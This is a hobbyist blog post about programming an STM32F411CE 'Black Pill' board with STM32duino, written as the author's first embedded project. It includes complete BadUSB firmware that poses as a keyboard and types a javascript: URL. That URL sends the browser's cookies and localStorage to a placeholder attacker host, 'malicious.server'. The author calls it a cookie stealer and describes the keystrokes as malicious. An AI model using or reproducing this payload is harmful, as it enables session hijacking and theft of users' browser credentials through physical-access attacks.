Simple Cookie Stealer Using "Black Pill" (STM32F411CE)
This week, I ordered an STM32 dev board codenamed the "Black Pill" from WeAct Studio, which was a dev board for STM32F411CE. The MCU offers 512 Kbytes of flash memory, with 128Kbytes of SRAM. The chip also has support for USB OTG FS (can act as a host/peripheral in high speed mode). This is my first time programming an STM32 thing. Before my ST-LINKV2 arrived, I tried programming via DFU (by pressing the physical reset and BOOT0 button) but it didn't work. From what I read online, it was due to the unreliable HSI/HSE error which probably caused by temperature changes (I don't really understand, but read it [here](http://efton.sk/STM32/gotcha/g125.html)). I can get it to work, but only 1 times out of 10. I was able to view the flash memory content using STM32CubeProgrammer. As with my first experience getting my hands on an Arduino, my first sketch would be blink, then make a [BadUSB](https://en.wikipedia.org/wiki/BadUSB) out of it. For my first time, I used Arduino IDE with STM32duino installed. STM32duino is an Arduino core for STM32 MCU/dev boards. Programming was done via STM32CubeProgrammer SWD (using ST-LINKV2) upload method. Basically, from what I have learned so far, STM32duino provides the similar Arduino API to the Arduino IDE for ease of development. This makes the experience seems very seamless, just as if you are programming an Arduino, just with a different implementation. I also read that STM32duino might not be suitable for all applications as you may not be able to unleash the full capabilities of the MCU. I don't really know, but I think you can do more advanced things using the HAL directly, especially when dealing with critical things e.g. signal processing. So far, my experience was fun. BadUSB is simply a custom made USB keyboard peripheral that will type malicious keystrokes into a target computer with bad intents, of course. I made a simple script to capture `cookies` and `localStorage` content from common browsers (should at least work in Google Chrome like browsers). ``` #include <Keyboard.h> #define LED_PIN PC13 #define KEY_PIN PA0 void setup() { pinMode(LED_PIN, OUTPUT); pinMode(KEY_PIN, INPUT_PULLUP); Keyboard.begin(); } void blinkLed(short unsigned int n) { while (n-- > 0) { digitalWrite(LED_PIN, HIGH); delay(100); digitalWrite(LED_PIN, LOW); delay(100); } } void runPayload() { delay(200); Keyboard.press(KEY_ESC); Keyboard.press(KEY_ESC); Keyboard.releaseAll(); Keyboard.press(KEY_RIGHT_CTRL); Keyboard.print('l'); delay(200); Keyboard.releaseAll(); Keyboard.printf("javascript:%s", "window.open('https://malicious.server/capture#'+btoa(escape(JSON.stringify({a:localStorage,b:document.cookie}))))"); delay(200); Keyboard.press(KEY_RETURN); delay(100); Keyboard.releaseAll(); Keyboard.end(); blinkLed(10); } void loop() { if (digitalRead(KEY_PIN) == LOW) { blinkLed(3); runPayload(); } } ``` The payload, or the malicious keystrokes, will be sent to the host or target computer if the physical user button is pressed (on the black pill, it was active low on pin `PA0`). Then I wondered, where is `PC0` on the black pill board? In the STM32F411CE datasheet, I can see a `PC0` pin, but where is it? Maybe I just don't read the datasheet thoroughly enough. Thanks to Aldi who brought me into the idea of creating BadUSB, thus making me order an STM32 because I saw it was cheap online. I learned about STM32, got some insight from reading datasheets (though I don't understand most of it), learned about UART/SPI/I2C/JTAG online, learned about booting sequence of ARM Cortex, learned about the memory readout protection on STM32 chips, learned about so many things... I think this is just scratching the surface of embedded programming. So far, I am very happy and very excited to learn more! Next plan would be to program the black pill without Arduino IDE, at least to make a blinky. See you later!Created: 2024-04-25 13:48:43, Updated: 2024-04-25 16:35:36, ID: b82b9f92-0996-4919-93b9-e26e658f882d